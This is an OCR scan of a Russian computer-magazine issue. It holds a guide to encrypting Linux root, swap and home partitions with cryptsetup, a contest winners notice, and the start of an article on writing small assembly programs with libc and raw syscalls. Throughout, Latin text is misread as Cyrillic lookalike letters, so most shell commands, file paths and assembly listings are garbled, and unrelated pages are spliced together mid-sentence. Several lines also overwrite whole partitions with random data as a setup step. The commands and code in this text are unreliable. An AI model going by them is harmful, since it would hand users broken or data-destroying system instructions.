шифрования корневого раздела необходимо, чтобы /Ьооі-дирек- 
тория располагалась на отдельном разделе. І_іпих не поддержи- 
вает загрузку с шифрованных разделов напрямую. Вместо этого 
необходимо использовать іпіігб (ВАМ-диск, который грузится до 
монтирования корневого раздела). 

Для корректной работы с ибеѵ потребуется собрать тиІІіраіЬ- 
Іооіз: 



# етегде тиІІІраІЬ-ІооІз 

Необходимо создать и примонтировать іпіігб. Для этого монтируем 
/Ьооі-раздел и создаем пустой файл іпіігб: 

# тоипІ/ЬооІ 

# ІоисН /Ьооі/іпіігсі 

Заполняю нулями файл /Ьооі/іпіігб и придаем ему размер 4 Мб: 



# тоипІ/ЬооІ 
#таке 

# таке тобиІез_іпз1аІІ іпзіаіі 

Для простоты настройки сконфигурируем все пункты не модулями, 



# бб і1=/беѵ/2его о!=/Ьоо1/іпі1гб Ьз=1 М соип1=4 

Создаем ІоорЬаск-устройство для работы с файлом: 

# /зЬіп/ІозеІир /беѵ/ІоорО /Ьооі/іпіігб 

ж ѳ д п 
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Консоль: создание зашифрованного раз- Консоль: сітзеіир Із 
дела в виде файла на диске 



Б 

На сайте ѵѵѵѵѵѵ.сіііогит.ги/зесипіѵ/ 
сгѵоІоагаоГѵ/ можно найти статьи 
о криптографии, электронной 
подписи и программе ОпиРО. 



ІѲ5І1 = 9 
Іезі2 = ІезН 




Создаем на нем файловую систему Ехі2: 



Следующий шаг — настройка дшЬ: 



# /зЬіп/тке2^з /сіеѵ/іпіігсі 

# тксііг /тпі/іпіігсі 

Монтируем ІоорЬаск-устройство на каталог диска: 

# тоипШеѵ/ІоорО /тпі/іпіігсі 

Создаем дерево директорий и файлы скриптов: 

#ссІ /тпі/іпіігсі 

# тксііг еіс сіеѵ ІІЬ Ьіп ргос пеѵѵ 

# іоисЬ Ііпихгс сІеѵтар_ткпосІ.зІп 

# сЬтосІ +Х Ііпихгс сІеѵтар_ткпосІ.зІп 

Где Ііпихгс — скрипт, отвечающий за непосредственную загрузку, а 
сІеѵтар_ткпосІ.зІі — скрипт, который создает необходимые устройст- 
ва. Оба файла находятся на диске, прилагаемом к журналу. Копи- 
руем необходимые файлы: 

#ср/Ьіп/{зфсаІ,тоипІ,итоипІ, тксііг, сЬгооі,сгурізеіир,зІеер, ткпосі, 
зесі.гт} ./Ьіп 

Для каждого файла узнаем требуемые библиотеки и копируем их 
в директорию ІІЬ: 

# ІсІсІ /Ьіп/зН 

Ііпих-даіе.зо.1 =>(0хШе000) 

ІІЬсіі. 50.2 => /ІІЬ/ІІЬсІІ.зо.2 (0хЬ7Ш5000) 

ІіЬс.зо.6 => /ІіЬ/ІІЬс.30.6 (0хЬ7е51000) 

/ІІЬ/ІсІ-Ііпих.зо.2 (0хЬ7Г73000) 

#ср/ІіЬ/{ІіЬс.зо.6,ІсІ-Ііпих.зо.2} ./ІІЬ 

Создаем необходимые устройства, без которых не удастся загру- 
зить систему (если ты используешь другой раздел с корневой фай- 
ловой системой, то необходимые параметры ткпосі можно посмот- 
реть с помощью «Із -I /беѵ/бгіѵе» . Например, для /Ьеѵ/ЬбаЗ команда 
будет выглядеть так: «ткпосі /тпІ/іпіІгб/беѵ/ЬбаЗ Ь 3 3»): 



#ѵі/Ьооі/дгиЬ/дгиЬ.соИ 
ІШе=Оеп1:оо ЫпихѵѵііЬ іпіігсі 
гооЦЬсІО.О) 

кетеі /ѵтііпиг гооІ=/сІеѵ/гатО гѵѵ іпіі=/1іпихгс 
іпіігсі /іпіігсі 

Подготовительный процесс завершен. Остается зашифровать 
корневую файловую систему. Для этого нам понадобится чистый 
раздел достаточной емкости (обозначим его как /сІеѵ/зсІЫ ). Корне- 
вой раздел обозначим как/беѵ/зба2. 

# тксііг /тпі/{зсІа2,зсІЫ } 

#тоипІ/сІеѵ/зсІа2 /тпІ/зсІа2 
#тоипІ /сІеѵ/зсІЫ /тпІ/зсІЫ 

Копируем все содержимое корневого раздела в чистый раздел: 

# с р - г -р -ѵ /т пі/зсі а2/* /т пі/зсі Ы / 

#итоипі/сІеѵ/зсІа2 

Г Выполняем подготовительные процедуры для загрузки с копии 
системы (с/с/еу/зс/Ы ): 

Редактируем файл /тпі/зсІЬ 1/еіс/ізіаЬ: 



# ѵі /тпі/зсІЫ /еІсДзіаЬ 
/сІеѵ/зсІЫ / геізеТз поаііте 0 1 



2 



Редактируем /ЬооІ/дгиЬ/дгиЬ.сопІ: 



#ѵі/Ьооі/дгиЬ/дгиЬ.соИ 
іііІе=(Зепіоо Ыпих - Вооі Гот сору 
гооЦЬсІО.О) 

кетеі /ѵтііпиг гооІ=/сІеѵ/зсІЫ 
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Размонтируем устройство: 



#итоипІ /сІеѵ/зсІЫ 



# ткпосі /тпі/іпіігсі/сіеѵ/сопзоіе с 5 1 

# ткпосі /тпі/іпіігсі/сіеѵ/пиіі с 1 3 

# ткпосі /тпі/іпіігсІ/сІеѵ/зсІа2 Ь 8 2 

# ткпосі /тпі/іпіігсі/сіеѵ/йу с 5 О 

Проверим работоспособность всех программ в іпіігсі: 

# сЬгооі /тпі/іпіігсі /Ьіп/зЬ 
#/Ьіп/сЬгооі -Ьеір 

# /Ьіп/тксііг — Неір 

Размонтируем іпіігсі: 

# ССІ ~ 

# итоипі /тпі/іпіігсі /Ьооі 

Теперь редактируем ІзІаЬ, чтобы он соответствовал новому кор- 
невому разделу. В данном примере опция поаііте необязательна, 
но она позволяет ускорить дисковые операции, так как отключает 
запись времени последнего обращения к файлу. 

# ѵі /еісДзіаЬ 

/сІеѵ/таррег/гооІ/геізеЦз поаіітеО 1 



После загрузки с копии системы создаем зашифрованный корне- 
вой раздел: 

#/Ып/сгур1зе1:ир -у сгеаіе гооШеѵ/зсІа2 

Система потребует ввести пароль шифрования с подтверждением. 
Этот пароль будет спрашиваться при загрузке ОС. По умолчанию ис- 
пользуется алгоритм шифрования АЕЗ с длиной ключа 256 бит. Это 
очень надежный алгоритм, применяемый американскими спецслуж- 
бами для шифрования секретных документов. Доступные алгоритмы 
шифрования можно посмотреть командой «саі/ргос/сгуріо». С помо- 
щью ключа ‘-с’ можно указать, какой алгоритм использовать, с помо- 
щью ЧТ — выбрать алгоритм хэширования. 

Теперь создаем файловую систему ВеізегРЗ (или любую другую): 

# ткгеізегіз /сіеѵ/таррег/гооі: 

Копируем корневую систему на созданный зашифрованный 
раздел: 

# тоипі /иеѵ/таррег/гооі /тпѴзсІа2 
#тоипі /сІеѵ/зсІЫ /тпі/зсІЫ 

# ср -г -р -ѵ /тпІ/зсІЫ/* /тпІ/5СІа2/ 

#итоипІ /сІеѵ/зсІЫ /сІеѵ/зсІа2 
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На прилагаѳмдм к жур- 
налу СР/РѴР ты най- 
дешь скрипты Ііпихгс и 
сіеѵтар ткпосІ.зН. 



Все. Система гстсва к загрузке с зашифрованнсгс раздела. 

Шифрование 8ѴѴАР 

Для ОеЬіап: 

Н Удсстсверься, чтс в файле /еіс/беіаиііз/сгурісіізкз присутствует 
* следующая стрска: 



Шифрование Ноте-раздела 

Далее ссздадим шифрованный Иоте-раздел: 

^ Затираем раздел случайными данными: 

# сісі і!=/сІеѵ/игапсІот о1=/с!еѵ/зсІЫ Ьз=1 М 



# ѵі /е1с/Це1аиІ1з/сгурІсІізкз 
СВѴРТОІ5К5_ЕМАВІ_Е=Ѵез 



2 



Отредактируй файл /еІс/сгурИаЬ для настройки шифрования 
свопа (где /сіеѵ/зсіаб - имя раздела со свопом). 



Где /сІеѵ/зсІЫ — раздел, на котором будет располагаться шиф- 
рованный диск, а тісИаеІ — имя логического диска (/беѵ/таррег/ 
тісНаеІ). Внимание: пароль должен совпадать с паролем логина. 

# сгурізеіир -у сгеаіе тісИаеІ /сІеѵ/зсІЫ 



#ѵі/е!с/сгурНаЬ 

сгурізѵѵар /сіеѵ/зсіаб /сіеѵ/игапсіот зѵѵар, сірЬег=аез,зІ2:е=256, зѵѵар 



8 



Отредактируй /еІс/ІзІаЬ, чтобы вместо обычного своп-раздела 
использовался раздел Оеѵісе-таррег. 



2 



Проверим, что это работает: 



#сІтзе!ир Із 
тісЬаеі (254, 1) 
сгурізѵѵар (254, 0) 



# ѵі /еІс/ІзІаЬ 

/сіеѵ/таррег/сгурізѵѵар попе зѵѵар зѵѵ 0 0 



'Создаем файловую систему ЕхІЗ (естественно, вместо ЕхІЗ мо- 
*жет выступать любая ФС): 



Для (Зепіоо порядок действий будет выглядеть следующим 
. образом: 

Г Добавь в файл /еіс/сопі.сі/сгурііз строчку: 



# тке21з -\ /сіеѵ/таррег/тісіпаеі 






Отмонтируем 



раздел: 



# ѵі /еіс/сопі.сі/сгурііз 
зѵѵар=сгур!зѵѵарзоигсе=’/сІеѵ/зсІа5’ 

Отредактируй файл /еІс/ІзІаЬ: 

#ѵі /еІс/ІзІаЬ 

/сіеѵ/таррег/сгурізѵѵар попе зѵѵар зѵѵО 

В результате мы получим своп-раздел сгурізѵѵар, шифруемый 
случайным ключом. Но сначала неплохо бы затереть старый 
своп случайными данными, так как в свопе могут находиться 
куски приватных данных, оставленные там после работы раз- 
личных программ: 

# зѵѵароіі 

# сісі і!=/сІеѵ/игапсІот 0І=/сІеѵ/зсІа5 Ьз=1 М 

После этого можно перезагрузиться и начать использовать 
новый зашифрованный своп. Пароль при загрузке запраши- 
ваться не будет. 



# сітзеіир гетоѵе тісіпаеі 

В случае использования целого диска, а не раздела, можно везде 
указывать /беѵ/збЬ вместо /беѵ/збЫ . 

Для автомонтирования раздела скачиваем ( Пр.беЫап.ога/беЫап/ 
рооІ/таіп/ІіЬр/ІіЬрат-тоипіЛ и устанавливаем ІіЬрат-тоипІ: 

# сіркд -і ІІЬрат-тоип1_0.9.22-6_і386.сІеЬ 

В случае с (Зепіоо скачиваем еЬиіІсІ с Ьиаз.аепіоо.ога/аііасіптепі. 
саі?ісІ=64090 и распаковываем его в/изг/іосаі/рогіаде/зуз-іібз. Да- 
лее добавляем строчку в /еіс/таке.сопі: 

#ѵі/е1с/таке.соп! 

РОВТОІВ_ОѴЕНЕАУ=/изг/ІосаІ/рог1аде 

Собираем рат_тоип1 (сначала добавим строчку 
в /еіс/рогіаде/раскаде.кеуѵѵогсіз, так как он помечен 
нестабильным): 
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# есЬо “зуз-ІІЬз/рат_тоип1: ~х86” » /еіс/рогіаде/раскаде.кеуѵѵогсіз 

# етегде рат_тоипІ 

Для ОѳЬіап процесс настройки заключается в редактировании 
конфигурационных файлов /еіс/іодіп.сіеіз и /еІс/рат.сІ/{соттоп- 
аиІфсоттоп-зеззіоп,рат_тоип1.сопІ}: 



# ѵі /еІс/рат.сІ/соттоп-аиІД 

аиіЬ орііопаі раігыгюипі.зо изеДігзЩразз 

# ѵі /еіс/рат.сі/соттоп-зеззіоп 

зеззіопорііопаі рат_тоипі.зо 

# ѵі /еІс/зесигі1:у/рат_тоип1:.сопГ 

ѵоіите тісИаеІ сгурі - /сІеѵ/зсІЫ Люте/тісЬаеІ сірИег=аез - - 



#ѵі/еІс/Іодіп.сІеІз 

СІ_ОЗЕ_ЗЕЗЗІОІ\ІЗуез 



Для (Зепіоо ситуация схожа: 



г 



Добавляем в фаілп/еіс/рат.сі/іодіп строки: 



#ѵі/еІс/рат.сІ/Іодіп 

аиііп орііопаі /ІіЬ/зесигііу/рат_тоипі.зо изе_Іігзі_разз 

зеззіоп орііопаі /ІІЬ/зесигііу/рат_тоип1:.зо 



2 



Добавляем в файл /еІс/зесигіІу/рат_тоипЕсопІ строку: 



# ѵі /еІс/зесигіІу/рат_тоипі.соп1 : 

ѵоіите тіскіаеі сгурі - /сІеѵ/зсІЫ Люте/тісЬаеІ сірЬег=аез - - 

После этого входим под именем тісИаеІ. Диск должен автомати- 
чески примонтироваться на Дюте/тісНаеІ. Беда в том, что права 
доступа у каталога будут гоокгооі. Необходимо их сменить на поль- 
зовательские: 



#сЬоѵѵп тісИаеІшзегзЛюте/тісІпаеІ 

Кроме того, существует возможность шифрования раздела не па- 
ролем логина, а отдельно сгенерированным ключом. В этом случае 
можно легко сменить пароль логина без необходимости решиф- 
рации диска. Правда, зная пароль логина, можно легко получить 
этот ключ. Поэтому использование данного способа шифрования 
я считаю неоправданным. Другое дело, если ключ находится на 
внешнем носителе, например на ІІЗВ-флешке. Тогда, зная пароль, 
но не имея флеш-носителя, расшифровать раздел будет невоз- 
можно. 

Устанавливаем орепззі: 

сІеЬіап# арі-деі іпзіаІІ орепззі 




Консоль: ѵѵікі, посвященная Эт-сгурі 
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Консоль: дѵіт/еГсДзІаЬ 



депіоо# етегде орепззі 

Создаем ключ длиной 256 бит: 

#саШеѵ/игапсІот I ИеасІ-с32>/Гіоте/тісІпаеІ.кеу 

Создаем шифрованный И о те- раз дел: 

# сісі іГ=/сІеѵ/игапсІот о?=/сІеѵ/зсІЫ Ьз=1 М 
#саі/Іпоте/тісІпаеІ.кеу I сгурізеіир сгеаіе тіскіаеі /сІеѵ/зсІЫ 

# тке2!з -\ /сІеѵ/таррег/тісИаеІ 
#сІтзеіир гетоѵе тіскіаеі 

Шифруем ключ, которым зашифрован диск: 

#са!/Іпоте/тісІпаеІ.кеу I орепззі аез-256-есЬ > /Гіоте/тісЬаеІ.кеу 

В запросе на ввод пароля пишем пароль логина. 

Далее происходит процесс настройки — он такой же, как и с шиф- 
рованием без ключа, за исключением одной строчки: 

# ѵі /еІс/зесигіІу/раітытоипТсоИ 

ѵоіите тісГіаеІ сгурі - /сІеѵ/зсІЫ /Гіоте/тісГіаеІ сірПег=аез аез-256-есЬ /Гюте/ 
тісЬаеІ.кеу 

Раздел в виде файла на диске 

Для начала необходимо создать файл заранее определенного раз- 
мера, предположим, 50 Мб: 

#іоисЬсгурісІізк 

# зГпгесІ -п 1 -з50М сгурісіізк 

Желательно затереть сгурібізк именно таким способом, так как 
в результате получится набор случайных данных, и нельзя будет 
точно узнать, сколько реальной информации хранится в этом фай- 
ле. Настало время создать шифрованный раздел посредством 
ІоорЬаск-устройства: 

# Іозеіир /сІеѵ/ІоорО -/сгурісіізк 

# сгурізеіир -у сгеаіе тусіізк /сІеѵ/ІоорО 

# ткгеізегіз /сіеѵ/таррег/тусіізк 

# тксііг /тпі/тусіізк 

#тоип! /сіеѵ/таррег/тусіізк /тпі/тусіізк 

Зашифрованный раздел теперь доступен через/тпі/тубізк. После 
завершения работы с приватными данными его следует размонти- 
ровать, а затем удалить ІоорЬаск-устройство, как показано ниже: 

# итоипі /тпі/тусіізк 

# сгурізеіир гетоѵе тусіізк 

# Іозеіир -сі /сІеѵ/ІоорО 

При желании можно написать небольшой скрипт, который будет 
выполнять все эти команды автоматически. з: 
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Т ° ГИ “«"КУРРа, 



ЗА ВРЕМЯ ПРОВЕДЕНИЯ КОНКУРСА МЫ ПОЛУЧИЛИ НЕМЕРЕНОЕ КОЛИЧЕСТВО ПИСЕМ: ДОВОЛЬНО МНОГО 
ЛЮДЕЙ ЗАХОТЕЛИ ПОДНЯТЬ НА ХАЛЯВУ ТѴ-ТЮНЕРОТКОМПАНИИ ВЕНОШЕЯ . НЕПРОСТЫМ ДЕЛОМ БЫЛО 
ОПРЕДЕЛИТЬ ПОБЕДИТЕЛЕЙ. НАПОМНЮ: ПЕРЕД УЧАСТНИКАМИ СТАВИЛАСЬ ЗАДАЧА ПРАВИЛЬНО ОТВЕ- 
ТИТЬ НА ТРИ ВОПРОСА И НАПИСАТЬ, ЗАЧЕМ, СОБСТВЕННО, ИМ НУЖЕН ТЮНЕР. ЕСЛИ С ПЕРВОЙ ЧАСТЬЮ 
ЗАДАНИЯ ВСЕ ЛЕГКО СПРАВИЛИСЬ, ТО СО ВТОРОЙ ВСЕ ОБСТОЯЛО НЕСКОЛЬКО СЛОЖНЕЕ. ОСОБО ОТ- 
БИТЫЕ ТОВАРИЩИ ХОТЕЛИ ПОЛУЧИТЬ ТѴ-ТЮНЕР, ЧТОБЫ «ЗАБИВАТЬ ИМ ГВОЗДИ», «ПОДАРИТЬ ЕГО СВОИМ 
ХОМЯЧКАМ» И ХИТСЕЗОНА-«НАМЫТЬ ПАРУ МИЛЛИГРАММОВ ЗОЛОТА С КОНТАКТОВ РАДИОДЕТАЛЕЙ». 
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доші да сам0 

Уг*'~ & 



V "АьІГ ппиныб читатели. 

..о собой, более созидательные 



г . ЗУ,. 

ВеГіоІсІ ТѴ 507 РЮЗ мы вручаем чуваку с ником сІ_ 2 акіг ( сі 2 акіг@сІіпеТги ) — программисту, которому 
этот тюнер необходим для своих программерских экспериментов и тестов. 

ВеГіоІсІ ТѴ 505 РЮЗ уходит Андрею из города Ульяновска, который будет записывать детские пере- 
дачи, вырезать из них поганую рекламу и показывать своим маленьким дочерям. 









ВеИоІсІ ТѴ СоІитЬиз мы отдаем ІапсеІоГу ( ІапсеІоІ@сЬегкеззк.ги Ѵ Этот парень очень много путе- 
шествует и перемещается с ноутбуком, из-за чего очень страдает, когда не может посмотреть 
футбольный матч. С новым тюнером такая проблема больше не появится. 
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Ііпіхоіа 



Даже при программировании на чистом ассемблере е 
файлы обычно получаются очень большими, но сущее 
твует масса способов уменьшить их размер. Давай напи- 
шем обычную ассемблерную программу и, убирая все 
лишнее, постепенно будем оптимизировать ее, вплоть 
до полного экстрима. 
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Программирование с ІіЬс — семейная идиллия 

Почему-то считается, что программирование на ассемблере под 
ІІІМІХ начинается с «прямого» общения с ядром в обход стандар- 
тной библиотеки ІіЬс. Мотивы этого заблуждения обычно крутятся 
вокругчрезмерного увлечения оптимизацией. Дескать, файлы, ис- 
пользующие ІіЬс, медленные, неповоротливые и большие, каксло- 
нопотамы. Согласен, в отношении программ типа « ЬіеІІо, ѵѵогісі ! » это 
действительно так, однако в реальной жизни отказ от ІіЬс означает 
потерю совместимости с другими системами и ведет к необходи- 
мости переписывания уже давно написанного и отлаженного кода, 
в результате чего оптимизация превращается в «пессимизацию». 
Никаких убедительных доводов для отказа от высокоуровневых 
языков еще никто не привел, и прибегать к ассемблеру следует 
лишь в том случае, когда компиляторы уже не справляются. На 
ассемблере обычно пишутся критические к быстродействию вы- 
числительные модули, «перемалывающие» данные и вообще не 
обращающиеся ни к ІіЬс, ни к ядру. Если же все-таки по каким-то 
причинам программа должна быть написана на ассемблере це- 
ликом, интерфейс ІіЬс будет хорошим выбором. Первую брачную 
ночь с ассемблером мы проведем именно с этой библиотекой, а 
дальше — на твое усмотрение: оставаться с ней и дальше или идти 
штурмовать ядро. 

Ассемблерные файлы имеюттрадиционное расширение «.5», что 
позволяет нам ассемблировать программы при помощи... компи- 
ляторадсс! Кто сказал, что это извращение? Напротив! Распознав 



по расширению ассемблерную природу транслируемого файла, 
дсс пропускает его через даз, передавая полученный результат 
линкеру, благодаря чему процесс сборки существенно упроща- 
ется, и мы получаем в распоряжение достаточно мощный сишный 
препроцессор, хоть и не такой мощный, как в ТАЗМ. 

Естественно, ассемблируя программы «вручную», мы можем на- 
значать им любые расширения, какие только захотим, — и «.азт» 
в том числе. Прежде чем ассемблировать программу, ее нужно 
создать! Мы будем использовать стандартный для ІЛМІХ’а ассем- 
блер аз, на самом деле представляющий собой целое семейство 
ассемблеров для платформ различного типа (подробности в 
«тап аз»). 

Структурно программа состоит из секции кода, объявленной ди- 
рективой «Тех!» и секции данных («.сіаіа»), которые могут распо- 
лагаться в любом порядке. На размер сгенерированного файла 
это никак не влияет — все равно линкер переставит их по-своему. 
Объявлять вызываемые ІіЬс-функции «внешними» (директива 
«.ехіегп») совершенно не обязательно. Имена функций пишутся, 
как они есть, без всяких символов прочерка. Точка входа в про- 
грамму означается меткой таіп, которая обязательно должнабыть 
объявлена как дІоЬаІ. В действительности при запуске программы 
первым управление получает стартовый код библиотеки ІіЬс, ко- 
торый уже и вызывает таіп. Если такой метки там не окажется, то 
линкер сообщит о неразрешимой ссылке — и все. Выходить из 
таіп можно как по ехіІ(егг_сосіе), так и по машинной команде ВЕТ, 








возвращающей нас в стартовый код, корректно завершающим 
выполнение. Это короче, но в последнем случае мы теряем воз- 
можность передавать код возврата, который можно «подсмот- 
реть» командой «есИо $?» после завершения работы программы. 
Согласно Си-соглашению, аргументы функций заносятся в стек 
справа налево. Стек «чистит» вызывающий код. 

Вот, собственно, и все. С полученным «багажом » знаний уже мож- 
но писать программу. В нашем случае она будет выглядеть так: 

Простейшая ассемблерная программа еіі ІІЬс.5 
Тех! 

.дІоЬаІ таіп 

таіп: 
ризГіІ $1еп 
ризГіІ $тзд 
ризГіІ $1 
саІІ ѵѵгііе 
абсІІ $12, %езр 
геі 

.сіаіа 

тзд: .азсіі «ГіеІІо,еІ!\п» 

Іеп = .-тзд 

Чтобы вдохнуть в ассемблерный файл жизнь, его необходимо про- 
гнать через транслятор, чем мы сейчас и займемся: 




$ дсс -о еІПіЬс еІПіЬс.8 

$ ./еІПіЬс 

ГіеІІо.еІ! 



На диске образуется файл еІПіЬс, победоносно выводящий 
«НіеІІо,еІТ» на экран, но занимающий при этом целых 12,096 байт 
(при трансляции под РгееВЗЭ -4,270). Нуимонстр! Куда это годит- 
ся?! А все потому, что компилятор самовольно прицепил символь- 
ную информацию, которая нам совершенно ни к чему. К счастью, 
ее очень легко отрезать штатной утилитой зігір. 

$з!гір еІПіЬс 

Файл сразу же похудел до 2,892 байт (под РгееВЗЭ — до 2,744), 
полностью сохранив свою работоспособность. С таким размером 
уже можно жить (особенно под РгееВЗЭ, где установлена старая 
версия компилятора). Естественно, сама операционная система 
тут ни при чем. 

А теперь, отказавшись от услуг дсс, попробуем собрать файл 
вручную. Под РгееВЗЭ это осуществляется так: 

$ аз -о еІПіЬс. о еІПіЬс. 3 
$ ІсІ -з -о еІПіЬс /изг/Шэ/сгН .о еІПіЬс. о -Іс 
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100 кб 



200 кб 



300 кб 



400 кб 



500 кб 



600 кб 



700 кб 



800 кб 



900 кб 



1мб 



1100 кб 



1200 кб 



1300 кб 



ІЛЧІХОЮ 




Реакция Ыпих'а на попытку ручкой сборки по типу ВЗй 

На диске образуется файл еІПіЬс размером всего 2,108 байт, что 
на 636 байт короче сборки дсс с последующим стрипаньем сим- 
вольной информации. То есть «ручная» сборка намного эффек- 
тивнее! С Ыпих’ом и Зоіагіз’ом в этом плане сложнее, да и не совсем 
понятно, где у них расположен стартовый код. Но это еще полбеды. 
Стартовый код содержит дикие зависимости, влекущие за собой 
дополнительные библиотеки, находящиеся в самых непредсказу- 
емых местах. Что же делать? Приходится обращаться за помощью 
к дсс. Уж он-то наверняка знает, где расположены его библиоте- 
ки. Ассемблируем файл транслятором аз и передаем полученный 
еІПіЬс. о на компоновку компилятору дсс. Стрипаем символьную 
информацию и получаем те же самые 2,892 байт, что и при автома- 
тической сборке. 

$ аз -о еІПіЬс. о еІПіЬс. 5 
$ дсс еІПіЬс. о -о еІПіЬс 
$з1гір еІПіЬс 

Выходит, что «полуавтоматическая» сборка под Ыпих’ом дает тот 
же самый результат, что и автоматическая, поэтому никакого смыс- 
ла работать руками здесь нет. 

Отладка ассемблерных программ 

Редкая программа начинает работать сразу же после запуска. 
Практически всегда она содержит ошибки, требующие отладки. 
Высокоуровневые программисты находятся в более выгодном 
положении, поскольку значительная часть ошибок отсеивается 
компилятором еще на стадии трансляции, к тому же сам синтаксис 
языка делает программу более выразительной. Одиночные ассем- 
блерные команды в отрыве от своего окружения абсолютно бес- 
смысленны, и обнаружить ошибку путем визуального просмотра 
листинга очень тяжело. 

Отладка ассемблерных программ — это тот вопрос, который боль- 
шинство составителей МогіаІ’овпредпочитаютобходить стороной. 
Существует даже мнение, что нормальных отладчиков под ІІІЧІХ во- 
обще нет, а «великий и могучий» дбЬ-ассемблер не переваривает 
в принципе. Что ж! Давай посмотрим, насколько это утверждение 
близко к истине. Пропустим ассемблерную программу через дсс, 
но на этот раз не будем удалять символьную информацию, которая, 
собственно говоря, для отладчика и предназначена. 

Загружаем еІПіЬс в дбЬ («дбЬ еІПіЬс»), тут же брякаемся на таіп 
(«Ь таіп»), запускаем программу командой «г» и, дождавшись 
срабатывания точки останова, пробуем трассировать (команда 
«з» — трассировка без захода в функции, «п» — с заходом). От- 
ладчик тут же слетает с катушек, ругаясь на отсутствие информа- 
ции о номерах строк. 

И хотя отладка на ассемблерном уровне (не путать с уровнем ис- 
ходных текстов!) все-таки доступна (даем команду «бізріау/і $рс» 
для отображения ассемблерных мнемоник и ведем трассировку 
командами «зі» и «пі »), но в этом случае мы теряем всю инфор- 
мацию об именах функций, метках и переменных. Короче говоря, 
львиная доля смысла листинга уходит в никуда. Но, если отладоч- 
ной информации нет, это еще не означает, что ее нельзя подклю- 
чить! В частности, у дсс за это отвечает ключ «-д», а сам процесс 
сборки выглядит так: 

$ дсс -д -о еІПіЬс еІПіЬс. 3 
$сІЬд еІПіЬс 

Ого! Размер файла после подключения отладочной информации 
возрос до 1 2,268 байт, что на 1 72 байта больше, чем у файла, соб- 
ранного нормальным способом (без отрезания символьной ин- 
формации, конечно). 

Грузим программу в отладчик, вновь брякаемся на таіп, говорим 
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Процесс обучения 
программирова- 
нию на ассемб- 
лере под ЦІЧІХ 
погружен в эроти- 
ческий полумрак. 
в котором, каки 
в первую ночь с 
женшиной, прихо- 
дится действовать 
наѵгад. 




Отладка ассемблерной программы без символьной информации 

«г» и... чудо! Команды «з» и «п» теперь нормально работают, отоб- 
ражая программу так, как она выглядела в исходном тексте! 
Правда, под РгееВЗЭ этот прием не срабатывает, и для подклю- 
чения отладочной информации приходится собирать программу 
вручную. Транслятору ассемблера необходимо указать ключ «- 
дзіабз», а у линкера отобрать ключ «-з», отвечающий за удаление 
всей отладочной информации. Переводя на язык команд, это вы- 
глядит так: 

$ аз -дзІаЬз -о еІПіЬс.о еІПіЬс.З 
$ ІсІ -о еІПіЬс /изг/ІІЬ/сіП .о еІПіЬс.о -Іс 
$дсІЬ еІПІЬс 

Размер файла с отладочной информацией составляет всего 
3,145 байта, что намного меньше, чем при автоматической сборке 
с дсс, при этом программа нормально отлаживается ! Так что дела- 
ем выводы и решаем, на чем сидеть и с кем дружить! 

Программирование без ІіЬс — штурм ядра 

Интерфейс системных вызовов (они же зузсаІІ’ы) — это «задний двор» 
операционной системы, ее собственная и к тому же недокументиро- 
ванная кухня. Реально в зузсаІІ’ах нуждаются одни лишь черви, рас- 
пространяющиеся через переполняющиеся буферы. Они крайне 
ограничены в размерах, чтобы реализовать процедуру поиска ІіЬс в 
памяти. И еще — драйвера. Но драйвера пишутся под конкретные 
системы, и никто не собирается требовать от них переносимости, а 
мы говорим про прикладные программы ! Какой ассемблерный Іиіог не 
возьми, там обязательно будут зузсаІІ’ы, так что мы их и рассмотрим. 
І_іпих используетіазісаіі-соглашение о передаче параметров. Это зна- 
чит, что номер системного вызова помещается в регистр ЕАХ, пара- 
метры передаются слева направо через регистры ЕВХ, ЕСХ, ЕОХ, ЕЗІ, 
ЕЭІ, ЕВР. Если системный вызов принимает больше шести парамет- 
ров, то они передаются со структурой, указатель на которую заносит- 
ся в ЕВХ. Передачауправления происходит путем вызова прерывания 
«ІІЧТ 806». 

Разумеется, это только общая схема, и на практике постоянно прихо- 
дится сталкиваться с отступлением от правил. Общение с системными 
вызовами напоминаетхождение по минному полю. Допустим, мы хотим 
вызвать ѵѵгііе (системный вызов). Для начала необходимо узнать его но- 
мер. Системные вызовы перечислены в фате /изг/іпсіиде/зуз/зузсаіі.іп. 
В ВЗО-системах номера присутствуют сразу, а вот Ыпих нас отсылает 
к фату /изг/іпсШе/Ыіз/зузсаІІ.Іі, в котором номеров нет, зато есть нис- 
ходящие определения. 

Лезем в тап («тап 2 ѵѵгііе » ) и смотрим, какие параметры этот вызов 
принимает. Ага, \л/гііе(іп! б, сопзі ѵоіб *ЬиТ, зі т.е_Х п_Ьуіез). То есть мы 
должны занести #4 в ЕАХ, файловый дескриптор — в ЕВХ, указатель 
на выводимую строку — в ЕСХ и количество выводимых байт — в ЕОХ, 
после чего вызвать прерывание «ІІЧТ 806». 

ВЗО-системы используют гибридный механизм — прерывание 
«ІІЧТ 806» и «РАР САН 00076:000000006». Номера системных вызо- 
вов также, как и в Ыпих, помещаются в регистр еах, а вот параметры 
передаются через стек по Си-подобному соглашению (то есть первым 
заносится крайний правый параметр, последним в стекложится фик- 
тивный бѵѵогсі, а стек чистит за собой вызывающий код). Поскольку 
номера базовых системных вызовов в обеих системах совпадают, 
можно исхитриться и написать программу, работающую под обеими 
операционными системами: Ыпих не обращает внимания на стек, а 
ВЗО — на регистры, что позволяет нам продублировать параметры 
и там, и там. Естественно, это увеличивает размер программы, но, к 
нашему счастью, РгееВЗО позволяет эмулировать Ыпих-интерфейс. 
Достаточно дать команду «ЬгапбеІЫ Ыпих имя_файла», после чего 
нам останется только запустить его! А Ыпих, в свою очередь, умеет 
эмулировать ВЗЭ, ЗипОЗ и еще много чего! Но довольно слов, пе- 
реходим к делу! Перепишем нашу программу, чтобы она выводи- 
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ла приветствие через системный вызов ѵѵгііе без 
использования ІіЬс. Стартовый код в этом случае 
исчезает, и точкой входа в программу становится 
метка «_5ІагІ», объявленная как дІоЬаІ. Ну, а сама 
программа выглядит так: 

Ассемблерная программа еіі 806.3 
Тех! 

.дІоЬаІ _зІагі 
_зіагі: 

тоѵі $4,%еах 
тоѵІ$1,%еЬх 
тоѵі $тзд,%есх 
тоѵі $Іеп,%есІх 
Іпі$0х80 
тоѵІ$1, %еах 
хогі %еЬх,%еЬх 
іпі $0x80 
.баіа 

тзд: .азсіі «ГіеІІо.еІАп 
Іеп = . - тзд 

Пара замечаний к программе. Инструкция «МОѴІ_ $1 ,%ЕВХ» 
занимает пять байт, но при желании ее можно ужать до трех: 
«ХОРЬ %ЕВХ,%ЕВХ», «ІІ\ІСІ_ %ЕВХ», однако, учитывая размер 
служебных полей еІІ-файла, выигрыш не составит и доли про- 
цента, так что над оптимизацией кода можно не напрягаться. 
